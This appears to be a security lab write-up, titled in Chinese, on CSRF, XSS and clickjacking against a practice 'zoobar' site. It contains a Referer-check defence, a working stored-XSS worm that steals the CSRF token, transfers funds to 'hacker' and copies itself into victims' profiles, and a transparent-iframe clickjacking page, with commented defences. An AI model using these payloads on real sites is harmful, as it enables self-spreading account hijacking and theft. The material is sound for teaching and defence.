信息安全实践:CSRF & XSS & Click Jacking
CSRF
防御
Referer
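/*
 * Add to transfer.php: a Referer-based CSRF check.
 *
 * The transfer is only honoured when the browser reports that the request
 * originated from this site's own transfer page.  A missing Referer header
 * now fails closed without raising an undefined-index notice, and the
 * comparison is strict (!==) so no type juggling can make an unexpected
 * value compare equal.  The header is HTML-encoded before being echoed,
 * because it is client-supplied and would otherwise be a reflected XSS sink.
 *
 * Caveat: Referer is sent by the client and is frequently stripped by privacy
 * settings, proxies or Referrer-Policy, so legitimate users may be rejected.
 * Treat this as a complement to, not a replacement for, the per-form "csrf"
 * token this application also uses.
 */
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
echo htmlspecialchars($referer, ENT_QUOTES, 'UTF-8');
if ($referer !== "http://myzoo.com/transfer.php") {
    echo "transfer fail";
} else {
    echo "transfer pass";
}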
XSS
蠕虫
<span id=hack>
<script>
// Stored-XSS worm payload saved in a user profile.  Because the profile is
// rendered unescaped, this script executes in the site's own origin and can
// issue same-origin requests that carry the victim's session cookie.
// Server-side fix: HTML-encode profile content on output so this <script>
// is displayed as text instead of executed; a Content-Security-Policy
// without 'unsafe-inline' would also block it.  SameSite cookies and
// Referer checks do not help here - every request below is same-origin.
/* Step 1: fetch the transfer page and read the CSRF token out of it */
var a = new XMLHttpRequest();
var t, context;
a.onreadystatechange = function() {
if(a.readyState == 4) {
context = (a.responseText);
/* The token input has id "csrf".  The +24 offset and 32-character length
   are assumptions about the exact markup of transfer.php and break if
   that page changes - TODO confirm against the real form. */
alert(context.substr(context.indexOf("csrf")+24, 32)) // debug output only
t = context.substr(context.indexOf("csrf")+24, 32);
}
};
// Synchronous XHR (third argument false), presumably so that t is already
// populated before the requests below are built.
a.open("GET", "transfer.php", false);
a.send()
/* Step 2: transfer a zoobar to "hacker" using the harvested token */
var b = new XMLHttpRequest();
b.open("POST", "transfer.php", true);
b.setRequestHeader("content-type", "application/x-www-form-urlencoded");
w = "zoobars=1&recipient=hacker&submission=Send&csrf="+t;
b.send(w);
/* Step 3: propagation - copy this span's own HTML (the payload) into the
   victim's profile, so everyone who views that profile becomes a carrier. */
var c = new XMLHttpRequest();
c.open("POST", "index.php", true);
c.setRequestHeader("Content-type","application/x-www-form-urlencoded");
str = "<span id=hack>" + document.getElementById("hack").innerHTML + "</span>";
str = encodeURIComponent(str);
w = "profile_submit=Save&profile_update=" + str;
c.send(w);
</script>
</span>
Click Jacking
<!DOCTYPE html>
<html>
<!--
  Clickjacking demo: a fully transparent iframe of the target page is stacked
  above a decoy button, so a click on "click!" actually lands on whatever
  control the framed page places at that position.

  The defence belongs to the framed site, not to this page: send
  X-Frame-Options: DENY (or SAMEORIGIN) and/or
  Content-Security-Policy: frame-ancestors 'none' so browsers refuse to
  render it inside a third-party frame.  SameSite=Lax/Strict session cookies
  are not sent to a cross-site frame, which further limits what a framed
  page can do with the victim's session.
-->
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<head>
<title>click attack</title>
<style>
/* The overlay: invisible, on top (z-index 2), aligned to the page origin. */
iframe {
width: 600px;
height: 450px;
position: absolute; /* z-index only takes effect when position is not static */
top: -0px;
left: -0px;
z-index: 2;
-moz-opacity: 0; /* legacy Mozilla equivalent of opacity */
filter: alpha(opacity=0); /* legacy IE (pre-IE8) equivalent of opacity; filter is IE-specific */
opacity: 0;
}
/* The decoy: visible but placed beneath the iframe (z-index -1). */
button {
position: absolute;
top: 350px;
left: 170px;
z-index: -1;
width: 75px;
height:30px;
}
</style>
</head>
<body>
<iframe name="real" src="http:www.myzoo.com/transfer.php"> </iframe>
<button>click!</button>
</body>
</html>